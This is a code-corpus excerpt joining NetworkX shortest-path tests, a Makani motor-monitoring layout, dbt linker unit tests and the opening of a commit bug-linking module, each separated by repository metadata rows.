validate_path(self.cycle, 0, 3, 3, nx.dijkstra_path(self.cycle, 0, 3))
validate_path(self.cycle, 0, 4, 3, nx.dijkstra_path(self.cycle, 0, 4))
assert nx.single_source_dijkstra(self.cycle, 0, 0) == (0, [0])
def test_bidirectional_dijkstra(self):
validate_length_path(
self.XG, 's', 'v', 9, *nx.bidirectional_dijkstra(self.XG, 's', 'v'))
validate_length_path(
self.G, 's', 'v', 2, *nx.bidirectional_dijkstra(self.G, 's', 'v'))
validate_length_path(
self.cycle, 0, 3, 3, *nx.bidirectional_dijkstra(self.cycle, 0, 3))
validate_length_path(
self.cycle, 0, 4, 3, *nx.bidirectional_dijkstra(self.cycle, 0, 4))
validate_length_path(
self.XG3, 0, 3, 15, *nx.bidirectional_dijkstra(self.XG3, 0, 3))
validate_length_path(
self.XG4, 0, 2, 4, *nx.bidirectional_dijkstra(self.XG4, 0, 2))
# need more tests here
P = nx.single_source_dijkstra_path(self.XG, 's')['v']
validate_path(self.XG, 's', 'v', sum(self.XG[u][v]['weight'] for u, v in zip(
P[:-1], P[1:])), nx.dijkstra_path(self.XG, 's', 'v'))
# check absent source
G = nx.path_graph(2)
pytest.raises(nx.NodeNotFound, nx.bidirectional_dijkstra, G, 3, 0)
def test_bidirectional_dijkstra_no_path(self):
with pytest.raises(nx.NetworkXNoPath):
G = nx.Graph()
nx.add_path(G, [1, 2, 3])
nx.add_path(G, [4, 5, 6])
path = nx.bidirectional_dijkstra(G, 1, 6)
def test_absent_source(self):
# the check is in _dijkstra_multisource, but this will provide
# regression testing against later changes to any of the "client"
# Dijkstra or Bellman-Ford functions
G = nx.path_graph(2)
for fn in (nx.dijkstra_path,
nx.dijkstra_path_length,
nx.single_source_dijkstra_path,
nx.single_source_dijkstra_path_length,
nx.single_source_dijkstra,
nx.dijkstra_predecessor_and_distance,):
pytest.raises(nx.NodeNotFound, fn, G, 3, 0)
def test_dijkstra_predecessor1(self):
G = nx.path_graph(4)
assert (nx.dijkstra_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [1], 3: [2]}, {0: 0, 1: 1, 2: 2, 3: 3}))
def test_dijkstra_predecessor2(self):
# 4-cycle
G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 0)])
pred, dist = nx.dijkstra_predecessor_and_distance(G, (0))
assert pred[0] == []
assert pred[1] == [0]
assert pred[2] in [[1, 3], [3, 1]]
assert pred[3] == [0]
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
def test_dijkstra_predecessor3(self):
XG = nx.DiGraph()
XG.add_weighted_edges_from([('s', 'u', 10), ('s', 'x', 5),
('u', 'v', 1), ('u', 'x', 2),
('v', 'y', 1), ('x', 'u', 3),
('x', 'v', 5), ('x', 'y', 2),
('y', 's', 7), ('y', 'v', 6)])
(P, D) = nx.dijkstra_predecessor_and_distance(XG, 's')
assert P['v'] == ['u']
assert D['v'] == 9
(P, D) = nx.dijkstra_predecessor_and_distance(XG, 's', cutoff=8)
assert not 'v' in D
def test_single_source_dijkstra_path_length(self):
pl = nx.single_source_dijkstra_path_length
assert dict(pl(self.MXG4, 0))[2] == 4
spl = pl(self.MXG4, 0, cutoff=2)
assert not 2 in spl
def test_bidirectional_dijkstra_multigraph(self):
G = nx.MultiGraph()
G.add_edge('a', 'b', weight=10)
G.add_edge('a', 'b', weight=100)
dp = nx.bidirectional_dijkstra(G, 'a', 'b')
assert dp == (10, ['a', 'b'])
def test_dijkstra_pred_distance_multigraph(self):
G = nx.MultiGraph()
G.add_edge('a', 'b', key='short', foo=5, weight=100)
G.add_edge('a', 'b', key='long', bar=1, weight=110)
p, d = nx.dijkstra_predecessor_and_distance(G, 'a')
assert p == {'a': [], 'b': ['a']}
assert d == {'a': 0, 'b': 100}
def test_negative_edge_cycle(self):
G = nx.cycle_graph(5, create_using=nx.DiGraph())
assert nx.negative_edge_cycle(G) == False
G.add_edge(8, 9, weight=-7)
G.add_edge(9, 8, weight=3)
graph_size = len(G)
assert nx.negative_edge_cycle(G) == True
assert graph_size == len(G)
pytest.raises(ValueError, nx.single_source_dijkstra_path_length, G, 8)
pytest.raises(ValueError, nx.single_source_dijkstra, G, 8)
pytest.raises(ValueError, nx.dijkstra_predecessor_and_distance, G, 8)
G.add_edge(9, 10)
pytest.raises(ValueError, nx.bidirectional_dijkstra, G, 8, 10)
def test_weight_function(self):
"""Tests that a callable weight is interpreted as a weight
function instead of an edge attribute.
"""
# Create a triangle in which the edge from node 0 to node 2 has
# a large weight and the other two edges have a small weight.
G = nx.complete_graph(3)
G.adj[0][2]['weight'] = 10
G.adj[0][1]['weight'] = 1
G.adj[1][2]['weight'] = 1
# The weight function will take the multiplicative inverse of
# the weights on the edges. This way, weights that were large
# before now become small and vice versa.
def weight(u, v, d): return 1 / d['weight']
# The shortest path from 0 to 2 using the actual weights on the
# edges should be [0, 1, 2].
distance, path = nx.single_source_dijkstra(G, 0, 2)
assert distance == 2
assert path == [0, 1, 2]
# However, with the above weight function, the shortest path
# should be [0, 2], since that has a very small weight.
distance, path = nx.single_source_dijkstra(G, 0, 2, weight=weight)
assert distance == 1 / 10
assert path == [0, 2]
def test_all_pairs_dijkstra_path(self):
cycle = nx.cycle_graph(7)
p = dict(nx.all_pairs_dijkstra_path(cycle))
assert p[0][3] == [0, 1, 2, 3]
cycle[1][2]['weight'] = 10
p = dict(nx.all_pairs_dijkstra_path(cycle))
assert p[0][3] == [0, 6, 5, 4, 3]
def test_all_pairs_dijkstra_path_length(self):
cycle = nx.cycle_graph(7)
pl = dict(nx.all_pairs_dijkstra_path_length(cycle))
assert pl[0] == {0: 0, 1: 1, 2: 2, 3: 3, 4: 3, 5: 2, 6: 1}
cycle[1][2]['weight'] = 10
pl = dict(nx.all_pairs_dijkstra_path_length(cycle))
assert pl[0] == {0: 0, 1: 1, 2: 5, 3: 4, 4: 3, 5: 2, 6: 1}
def test_all_pairs_dijkstra(self):
cycle = nx.cycle_graph(7)
out = dict(nx.all_pairs_dijkstra(cycle))
assert out[0][0] == {0: 0, 1: 1, 2: 2, 3: 3, 4: 3, 5: 2, 6: 1}
assert out[0][1][3] == [0, 1, 2, 3]
cycle[1][2]['weight'] = 10
out = dict(nx.all_pairs_dijkstra(cycle))
assert out[0][0] == {0: 0, 1: 1, 2: 5, 3: 4, 4: 3, 5: 2, 6: 1}
assert out[0][1][3] == [0, 6, 5, 4, 3]
class TestDijkstraPathLength(object):
"""Unit tests for the :func:`networkx.dijkstra_path_length`
function.
"""
def test_weight_function(self):
"""Tests for computing the length of the shortest path using
Dijkstra's algorithm with a user-defined weight function.
"""
# Create a triangle in which the edge from node 0 to node 2 has
# a large weight and the other two edges have a small weight.
G = nx.complete_graph(3)
G.adj[0][2]['weight'] = 10
G.adj[0][1]['weight'] = 1
G.adj[1][2]['weight'] = 1
# The weight function will take the multiplicative inverse of
# the weights on the edges. This way, weights that were large
# before now become small and vice versa.
def weight(u, v, d): return 1 / d['weight']
# The shortest path from 0 to 2 using the actual weights on the
# edges should be [0, 1, 2]. However, with the above weight
# function, the shortest path should be [0, 2], since that has a
# very small weight.
length = nx.dijkstra_path_length(G, 0, 2, weight=weight)
assert length == 1 / 10
class TestMultiSourceDijkstra(object):
"""Unit tests for the multi-source dialect of Dijkstra's shortest
path algorithms.
"""
def test_no_sources(self):
with pytest.raises(ValueError):
nx.multi_source_dijkstra(nx.Graph(), {})
def test_path_no_sources(self):
with pytest.raises(ValueError):
nx.multi_source_dijkstra_path(nx.Graph(), {})
def test_path_length_no_sources(self):
with pytest.raises(ValueError):
nx.multi_source_dijkstra_path_length(nx.Graph(), {})
def test_absent_source(self):
G = nx.path_graph(2)
for fn in (nx.multi_source_dijkstra_path,
nx.multi_source_dijkstra_path_length,
nx.multi_source_dijkstra,):
pytest.raises(nx.NodeNotFound, fn, G, [3], 0)
def test_two_sources(self):
edges = [(0, 1, 1), (1, 2, 1), (2, 3, 10), (3, 4, 1)]
G = nx.Graph()
G.add_weighted_edges_from(edges)
sources = {0, 4}
distances, paths = nx.multi_source_dijkstra(G, sources)
expected_distances = {0: 0, 1: 1, 2: 2, 3: 1, 4: 0}
expected_paths = {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [4, 3], 4: [4]}
assert distances == expected_distances
assert paths == expected_paths
def test_simple_paths(self):
G = nx.path_graph(4)
lengths = nx.multi_source_dijkstra_path_length(G, [0])
assert lengths == {n: n for n in G}
paths = nx.multi_source_dijkstra_path(G, [0])
assert paths == {n: list(range(n + 1)) for n in G}
class TestBellmanFordAndGoldbergRadzik(WeightedTestBase):
def test_single_node_graph(self):
G = nx.DiGraph()
G.add_node(0)
assert nx.single_source_bellman_ford_path(G, 0) == {0: [0]}
assert nx.single_source_bellman_ford_path_length(G, 0) == {0: 0}
assert nx.single_source_bellman_ford(G, 0) == ({0: 0}, {0: [0]})
assert nx.bellman_ford_predecessor_and_distance(G, 0) == ({0: []}, {0: 0})
assert nx.goldberg_radzik(G, 0) == ({0: None}, {0: 0})
def test_absent_source_bellman_ford(self):
# the check is in _bellman_ford; this provides regression testing
# against later changes to "client" Bellman-Ford functions
G = nx.path_graph(2)
for fn in (nx.bellman_ford_predecessor_and_distance,
nx.bellman_ford_path,
nx.bellman_ford_path_length,
nx.single_source_bellman_ford_path,
nx.single_source_bellman_ford_path_length,
nx.single_source_bellman_ford,):
pytest.raises(nx.NodeNotFound, fn, G, 3, 0)
def test_absent_source_goldberg_radzik(self):
with pytest.raises(nx.NodeNotFound):
G = nx.path_graph(2)
nx.goldberg_radzik(G, 3, 0)
def test_negative_weight_cycle(self):
G = nx.cycle_graph(5, create_using=nx.DiGraph())
G.add_edge(1, 2, weight=-7)
for i in range(5):
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, i)
G = nx.cycle_graph(5) # undirected Graph
G.add_edge(1, 2, weight=-3)
for i in range(5):
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, i)
G = nx.DiGraph([(1, 1, {'weight': -1})])
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, 1)
# no negative cycle but negative weight
G = nx.cycle_graph(5, create_using=nx.DiGraph())
G.add_edge(1, 2, weight=-3)
assert (nx.single_source_bellman_ford_path(G, 0) ==
{0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3], 4: [0, 1, 2, 3, 4]})
assert (nx.single_source_bellman_ford_path_length(G, 0) ==
{0: 0, 1: 1, 2: -2, 3: -1, 4: 0})
assert (nx.single_source_bellman_ford(G, 0) ==
({0: 0, 1: 1, 2: -2, 3: -1, 4: 0},
{0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3], 4: [0, 1, 2, 3, 4]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [1], 3: [2], 4: [3]},
{0: 0, 1: 1, 2: -2, 3: -1, 4: 0}))
assert (nx.goldberg_radzik(G, 0) ==
({0: None, 1: 0, 2: 1, 3: 2, 4: 3},
{0: 0, 1: 1, 2: -2, 3: -1, 4: 0}))
def test_not_connected(self):
G = nx.complete_graph(6)
G.add_edge(10, 11)
G.add_edge(10, 12)
assert (nx.single_source_bellman_ford_path(G, 0) ==
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]})
assert (nx.single_source_bellman_ford_path_length(G, 0) ==
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})
assert (nx.single_source_bellman_ford(G, 0) ==
({0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1},
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [0], 3: [0], 4: [0], 5: [0]},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
assert (nx.goldberg_radzik(G, 0) ==
({0: None, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
# not connected, with a component not containing the source that
# contains a negative cost cycle.
G = nx.complete_graph(6)
G.add_edges_from([('A', 'B', {'load': 3}),
('B', 'C', {'load': -10}),
('C', 'A', {'load': 2})])
assert (nx.single_source_bellman_ford_path(G, 0, weight='load') ==
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]})
assert (nx.single_source_bellman_ford_path_length(G, 0, weight='load') ==
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})
assert (nx.single_source_bellman_ford(G, 0, weight='load') ==
({0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1},
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0, weight='load') ==
({0: [], 1: [0], 2: [0], 3: [0], 4: [0], 5: [0]},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
assert (nx.goldberg_radzik(G, 0, weight='load') ==
({0: None, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
def test_multigraph(self):
assert nx.bellman_ford_path(self.MXG, 's', 'v') == ['s', 'x', 'u', 'v']
assert nx.bellman_ford_path_length(self.MXG, 's', 'v') == 9
assert nx.single_source_bellman_ford_path(self.MXG, 's')['v'] == ['s', 'x', 'u', 'v']
assert nx.single_source_bellman_ford_path_length(self.MXG, 's')['v'] == 9
D, P = nx.single_source_bellman_ford(self.MXG, 's', target='v')
assert D == 9
assert P == ['s', 'x', 'u', 'v']
P, D = nx.bellman_ford_predecessor_and_distance(self.MXG, 's')
assert P['v'] == ['u']
assert D['v'] == 9
P, D = nx.goldberg_radzik(self.MXG, 's')
assert P['v'] == 'u'
assert D['v'] == 9
assert nx.bellman_ford_path(self.MXG4, 0, 2) == [0, 1, 2]
assert nx.bellman_ford_path_length(self.MXG4, 0, 2) == 4
assert nx.single_source_bellman_ford_path(self.MXG4, 0)[2] == [0, 1, 2]
assert nx.single_source_bellman_ford_path_length(self.MXG4, 0)[2] == 4
D, P = nx.single_source_bellman_ford(self.MXG4, 0, target=2)
assert D == 4
assert P == [0, 1, 2]
P, D = nx.bellman_ford_predecessor_and_distance(self.MXG4, 0)
assert P[2] == [1]
assert D[2] == 4
P, D = nx.goldberg_radzik(self.MXG4, 0)
assert P[2] == 1
assert D[2] == 4
def test_others(self):
assert nx.bellman_ford_path(self.XG, 's', 'v') == ['s', 'x', 'u', 'v']
assert nx.bellman_ford_path_length(self.XG, 's', 'v') == 9
assert nx.single_source_bellman_ford_path(self.XG, 's')['v'] == ['s', 'x', 'u', 'v']
assert nx.single_source_bellman_ford_path_length(self.XG, 's')['v'] == 9
D, P = nx.single_source_bellman_ford(self.XG, 's', target='v')
assert D == 9
assert P == ['s', 'x', 'u', 'v']
(P, D) = nx.bellman_ford_predecessor_and_distance(self.XG, 's')
assert P['v'] == ['u']
assert D['v'] == 9
(P, D) = nx.goldberg_radzik(self.XG, 's')
assert P['v'] == 'u'
assert D['v'] == 9
def test_path_graph(self):
G = nx.path_graph(4)
assert (nx.single_source_bellman_ford_path(G, 0) ==
{0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3]})
assert (nx.single_source_bellman_ford_path_length(G, 0) ==
{0: 0, 1: 1, 2: 2, 3: 3})
assert (nx.single_source_bellman_ford(G, 0) ==
({0: 0, 1: 1, 2: 2, 3: 3}, {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [1], 3: [2]}, {0: 0, 1: 1, 2: 2, 3: 3}))
assert (nx.goldberg_radzik(G, 0) ==
({0: None, 1: 0, 2: 1, 3: 2}, {0: 0, 1: 1, 2: 2, 3: 3}))
assert (nx.single_source_bellman_ford_path(G, 3) ==
{0: [3, 2, 1, 0], 1: [3, 2, 1], 2: [3, 2], 3: [3]})
assert (nx.single_source_bellman_ford_path_length(G, 3) ==
{0: 3, 1: 2, 2: 1, 3: 0})
assert (nx.single_source_bellman_ford(G, 3) ==
({0: 3, 1: 2, 2: 1, 3: 0}, {0: [3, 2, 1, 0], 1: [3, 2, 1], 2: [3, 2], 3: [3]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 3) ==
({0: [1], 1: [2], 2: [3], 3: []}, {0: 3, 1: 2, 2: 1, 3: 0}))
assert (nx.goldberg_radzik(G, 3) ==
({0: 1, 1: 2, 2: 3, 3: None}, {0: 3, 1: 2, 2: 1, 3: 0}))
def test_4_cycle(self):
# 4-cycle
G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 0)])
dist, path = nx.single_source_bellman_ford(G, 0)
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
assert path[0] == [0]
assert path[1] == [0, 1]
assert path[2] in [[0, 1, 2], [0, 3, 2]]
assert path[3] == [0, 3]
pred, dist = nx.bellman_ford_predecessor_and_distance(G, 0)
assert pred[0] == []
assert pred[1] == [0]
assert pred[2] in [[1, 3], [3, 1]]
assert pred[3] == [0]
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
pred, dist = nx.goldberg_radzik(G, 0)
assert pred[0] == None
assert pred[1] == 0
assert pred[2] in [1, 3]
assert pred[3] == 0
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
def test_negative_weight(self):
G = nx.DiGraph()
G.add_nodes_from('abcd')
G.add_edge('a','d', weight = 0)
G.add_edge('a','b', weight = 1)
G.add_edge('b','c', weight = -3)
G.add_edge('c','d', weight = 1)
assert nx.bellman_ford_path(G, 'a', 'd') == ['a', 'b', 'c', 'd']
assert nx.bellman_ford_path_length(G, 'a', 'd') == -1
class TestJohnsonAlgorithm(WeightedTestBase):
def test_single_node_graph(self):
with pytest.raises(nx.NetworkXError):
G = nx.DiGraph()
G.add_node(0)
nx.johnson(G)
def test_negative_cycle(self):
G = nx.DiGraph()
G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -5),
('0', '2', 2), ('1', '2', 4),
('2', '3', 1)])
pytest.raises(nx.NetworkXUnbounded, nx.johnson, G)
G = nx.Graph()
G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -5),
('0', '2', 2), ('1', '2', 4),
('2', '3', 1)])
pytest.raises(nx.NetworkXUnbounded, nx.johnson, G)
def test_negative_weights(self):
G = nx.DiGraph()
G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5),
('0', '2', 2), ('1', '2', 4),
('2', '3', 1)])
paths = nx.johnson(G)
assert paths == {'1': {'1': ['1'], '3': ['1', '2', '3'],
'2': ['1', '2']}, '0': {'1': ['0', '1'],
'0': ['0'], '3': ['0', '1', '2', '3'],
'2': ['0', '1', '2']}, '3': {'3': ['3']},
'2': {'3': ['2', '3'], '2': ['2']}}
def test_unweighted_graph(self):
with pytest.raises(nx.NetworkXError):
G = nx.path_graph(5)
nx.johnson(G)
def test_graphs(self):
validate_path(self.XG, 's', 'v', 9, nx.johnson(self.XG)['s']['v'])
validate_path(self.MXG, 's', 'v', 9, nx.johnson(self.MXG)['s']['v'])
validate_path(self.XG2, 1, 3, 4, nx.johnson(self.XG2)[1][3])
validate_path(self.XG3, 0, 3, 15, nx.johnson(self.XG3)[0][3])
validate_path(self.XG4, 0, 2, 4, nx.johnson(self.XG4)[0][2])
validate_path(self.MXG4, 0, 2, 4, nx.johnson(self.MXG4)[0][2])
| mit | -4,608,623,554,818,168,000 | 44.279869 | 100 | 0.493855 | false |
google/makani | gs/monitor2/apps/plugins/layouts/motor_layout.py | 1 | 2241 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layout to monitor motors."""
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.plugins import common
from makani.gs.monitor2.apps.plugins.indicators import motor
class MotorLayout(base.BaseLayout):
"""Layout to monitor motors."""
_NAME = 'Motors'
_DESIRED_VIEW_COLS = 2
_MODE = common.FULL_COMMS_MODE
def Initialize(self):
# Define how motors should be grouped, each group renders a chart.
self._motor_groups = {
'PTO/SBO': ['Pto', 'Sbo'],
'PBO/STO': ['Pbo', 'Sto'],
'PTI/SBI': ['Pti', 'Sbi'],
'PBI/STI': ['Pbi', 'Sti'],
}
self._AddIndicators('Status', [
motor.AioUpdateIndicator(self._MODE),
motor.ArmedIndicator(self._MODE),
motor.ErrorIndicator(self._MODE),
motor.WarningIndicator(self._MODE),
motor.MotorBusVoltageIndicator(self._MODE),
])
self._AddIndicators('Temperatures', [
motor.BoardTemperatureIndicator(self._MODE),
motor.HeatPlateTemperatureIndicator(self._MODE),
motor.StatorCoreTemperatureIndicator(self._MODE),
motor.WindingTemperatureIndicator(self._MODE),
])
self._AddIndicators('Warning and error printout', [
motor.MotorFlagNameIndicator(self._MODE, 'Warnings'),
motor.MotorFlagNameIndicator(self._MODE, 'Errors'),
])
self._UpdateProperties('Warning and error printout', {'cols': 2})
self._AddIndicators('Speed', [
motor.SpeedStackingChart(self._MODE, group_name, motor_short_names)
for group_name, motor_short_names in self._motor_groups.iteritems()])
self._UpdateProperties('Speed', {'cols': 2})
| apache-2.0 | -8,440,971,093,229,201,000 | 34.015625 | 77 | 0.685408 | false |
fishtown-analytics/dbt | test/unit/test_linker.py | 1 | 6077 | import os
import tempfile
import unittest
from unittest import mock
from dbt import linker
try:
from queue import Empty
except ImportError:
from Queue import Empty
def _mock_manifest(nodes):
manifest = mock.MagicMock(nodes={
n: mock.MagicMock(unique_id=n) for n in nodes
})
manifest.expect.side_effect = lambda n: mock.MagicMock(unique_id=n)
return manifest
class LinkerTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.object(linker, 'is_blocking_dependency')
self.is_blocking_dependency = self.patcher.start()
self.is_blocking_dependency.return_value = True
self.linker = linker.Linker()
def tearDown(self):
self.patcher.stop()
def test_linker_add_node(self):
expected_nodes = ['A', 'B', 'C']
for node in expected_nodes:
self.linker.add_node(node)
actual_nodes = self.linker.nodes()
for node in expected_nodes:
self.assertIn(node, actual_nodes)
self.assertEqual(len(actual_nodes), len(expected_nodes))
def test_linker_write_and_read_graph(self):
expected_nodes = ['A', 'B', 'C']
for node in expected_nodes:
self.linker.add_node(node)
manifest = _mock_manifest('ABC')
(fd, fname) = tempfile.mkstemp()
os.close(fd)
try:
self.linker.write_graph(fname, manifest)
new_linker = linker.from_file(fname)
finally:
os.unlink(fname)
actual_nodes = new_linker.nodes()
for node in expected_nodes:
self.assertIn(node, actual_nodes)
self.assertEqual(len(actual_nodes), len(expected_nodes))
def assert_would_join(self, queue):
"""test join() without timeout risk"""
self.assertEqual(queue.inner.unfinished_tasks, 0)
def test_linker_add_dependency(self):
actual_deps = [('A', 'B'), ('A', 'C'), ('B', 'C')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
manifest = _mock_manifest('ABC')
queue = self.linker.as_graph_queue(manifest)
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'C')
with self.assertRaises(Empty):
queue.get(block=False)
self.assertFalse(queue.empty())
queue.mark_done('C')
self.assertFalse(queue.empty())
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'B')
with self.assertRaises(Empty):
queue.get(block=False)
self.assertFalse(queue.empty())
queue.mark_done('B')
self.assertFalse(queue.empty())
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'A')
with self.assertRaises(Empty):
queue.get(block=False)
self.assertTrue(queue.empty())
queue.mark_done('A')
self.assert_would_join(queue)
self.assertTrue(queue.empty())
def test_linker_add_disjoint_dependencies(self):
actual_deps = [('A', 'B')]
additional_node = 'Z'
for (l, r) in actual_deps:
self.linker.dependency(l, r)
self.linker.add_node(additional_node)
manifest = _mock_manifest('ABZ')
queue = self.linker.as_graph_queue(manifest)
# the first one we get must be B, it has the longest dep chain
first = queue.get(block=False)
self.assertEqual(first.unique_id, 'B')
self.assertFalse(queue.empty())
queue.mark_done('B')
self.assertFalse(queue.empty())
second = queue.get(block=False)
self.assertIn(second.unique_id, {'A', 'Z'})
self.assertFalse(queue.empty())
queue.mark_done(second.unique_id)
self.assertFalse(queue.empty())
third = queue.get(block=False)
self.assertIn(third.unique_id, {'A', 'Z'})
with self.assertRaises(Empty):
queue.get(block=False)
self.assertNotEqual(second.unique_id, third.unique_id)
self.assertTrue(queue.empty())
queue.mark_done(third.unique_id)
self.assert_would_join(queue)
self.assertTrue(queue.empty())
def test_linker_dependencies_limited_to_some_nodes(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
queue = self.linker.as_graph_queue(_mock_manifest('ABCD'), ['B'])
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'B')
self.assertTrue(queue.empty())
queue.mark_done('B')
self.assert_would_join(queue)
queue_2 = self.linker.as_graph_queue(_mock_manifest('ABCD'), ['A', 'B'])
got = queue_2.get(block=False)
self.assertEqual(got.unique_id, 'B')
self.assertFalse(queue_2.empty())
with self.assertRaises(Empty):
queue_2.get(block=False)
queue_2.mark_done('B')
self.assertFalse(queue_2.empty())
got = queue_2.get(block=False)
self.assertEqual(got.unique_id, 'A')
self.assertTrue(queue_2.empty())
with self.assertRaises(Empty):
queue_2.get(block=False)
self.assertTrue(queue_2.empty())
queue_2.mark_done('A')
self.assert_would_join(queue_2)
def test_linker_bad_limit_throws_runtime_error(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
with self.assertRaises(RuntimeError):
self.linker.as_graph_queue(_mock_manifest('ABCD'), ['ZZZ'])
def test__find_cycles__cycles(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'A')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
self.assertIsNotNone(self.linker.find_cycles())
def test__find_cycles__no_cycles(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
self.assertIsNone(self.linker.find_cycles())
| apache-2.0 | -9,025,431,726,065,684,000 | 30.984211 | 80 | 0.586803 | false |
bumper-app/bumper-bianca | bianca/analyzer/bugfinder.py | 1 | 3624 | """
file: bugfinder.py
author: Christoffer Rosen <[email protected]>
date: November 2013
description: Links changes that introduces bugs by identifying changes
that fix problems.
"""
import re
from orm.commit import *
from caslogging import logging
from analyzer.git_commit_linker import *
import json
class BugFinder:
"""
BugFinder():
description: Links changes that introduces bugs.
"""
def __init__(self, allCommits, correctiveCommits, issueTracker):
"""
Constructor
@param commits: All commits in ascending order by date
@param correctiveCommits: All commits/changes which are identified
as fixing problems.
@param issueTracker: Issue tracker (e.g., GitHub Issues)
"""
self.allCommits = allCommits
self.correctiveCommits = correctiveCommits
self.issueTracker = issueTracker
def findIssueOpened(self, correctiveCommit):
"""
findIssueIds()
If the corrective change/commit links to a issue in the issue tracker, returns
the date of oldest open issue found otherwise returns none
"""
issue_opened = None
if(self.issueTracker is None or hasattr(self.issueTracker, "getDateOpened") == False):
return None
idMatch = re.compile('#[\d]+')
issue_ids = idMatch.findall(correctiveCommit.commit_message)
issue_ids = [issue_id.strip('#') for issue_id in issue_ids] # Remove the '#' from ids
if len(issue_ids) > 0:
issue_opened = self.issueTracker.getDateOpened(issue_ids[0])
# Use the oldest open bug
for issue_id in issue_ids:
logging.info('Searching for issue id: ' + issue_id)
curr_issue_opened = self.issueTracker.getDateOpened(issue_id)
# Verify that an issue was found.
if curr_issue_opened is not None:
if int(curr_issue_opened) < int(issue_opened):
issue_opened = curr_issue_opened
return issue_opened
def searchForBuggyCommit(self, correctiveCommit):
"""
Finds the buggy commit based on the bug fixing commit
Helper method for markBuggyCommits. If commir links to an
issue tracker, we check files changed prior to this date.
Otherwise, me only check date prior to the fix.
@param correctiveCommits: the bug fixing commit
"""
bug_introduced_prior = correctiveCommit.author_date_unix_timestamp
issue_opened = self.findIssueOpened(correctiveCommit)
if issue_opened is not None:
bug_introduced_prior = issue_opened
if 'CAS_DELIMITER' in correctiveCommit.fileschanged:
# Provide legacy support for the previous fileschanged format
